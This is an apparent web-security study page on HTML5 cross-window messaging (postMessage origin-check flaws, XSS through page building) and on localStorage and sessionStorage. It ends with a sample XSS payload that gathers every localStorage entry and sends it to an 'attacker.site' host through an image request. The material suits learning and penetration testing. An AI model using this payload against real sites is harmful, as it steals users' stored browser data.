HTML5

Cross Window Messaging

HTML5 allows coms between iframes, frames, popups, and the current window; Regardless of SOP by using cross windows messaging. For cross windows messaging to work there needs to be a relationship.

Relationships:

A main window with an iframe
A main window that generates a popup

If the relationship exists then browser tabbed windows can communicate by calling the postMessage() API call. Below is an example of a relationship creation and communication.

For this to complete the communication the receiving window must have a listener.

A typical vuln is when the receiver does not check the origin of the sender message coms.

Page building:

When Cross Windows Messaging is used for page building then there is a possibility to do XSS via the sent message containing our payload.

Inject a JS payload if you can!

Storage:

HTML5 sites can use localStorage and sessionStorage objects via JS to store data in browser. Browser storage is 5mb-10mb, this is only accessible to the browser and cannot be passed like cookies. Browser Storage uses an array data model.

The Local storage is origin specific so any page in the origin can access the data. The data is cleared if an API call is made or the user cleans it up with the browser options.

The Session storage is window specific, so if you open up 5 tabs all pointing to the same URL they will all have their own session storage. This can be cleaned the same ways as the local storage along with when a browser window is closed.

Since these storage types are both managed by JS they can be stolen with XSS

Sample storage stealing xss payload:

<Script>
var i =0;
var stor="";
var img=new Image();
while (localStorage.key(i) !=null)
{
var key=localStorage.key(i);
stor+=key+": "+localStorage.getItem(key)+"\n";
i++;
}
img.src="http://attacker.site?steal.php?storage="+stor;
</script>

PreviousFlash Hacking NextWebSockets

Last updated 3 years ago

Was this helpful?